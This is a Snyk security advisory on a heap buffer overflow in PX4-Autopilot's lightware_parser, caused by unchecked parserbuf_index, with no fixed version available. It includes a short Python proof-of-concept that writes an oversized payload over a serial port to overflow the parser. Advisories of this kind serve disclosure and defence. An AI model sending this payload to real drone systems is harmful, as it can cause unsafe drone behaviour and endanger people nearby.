Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsThere is no fixed version for PX4/PX4-Autopilot
.
Affected versions of this package are vulnerable to Heap-based Buffer Overflow via the lightware_parser
function. An attacker can cause a heap buffer overflow leading to unexpected drone behavior by exploiting the absence of parserbuf_index
value checking.
Note:
The main cause of this vulnerability is a malfunction of the sensor device. However, malicious applications can exploit the vulnerability even if device sensor malfunction does not occur.
import serial
import time
ser = serial.Serial('/dev/pts/4')
if ser.isOpen():
print('Connection success')
else:
print('Connection failed')
exit()
payload = b'\n0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
try:
ser.write(payload)
print(f'Sent: {payload}')
except Exception as e:
print(f'Error: {e}')
finally:
ser.close()
print('Connection closed')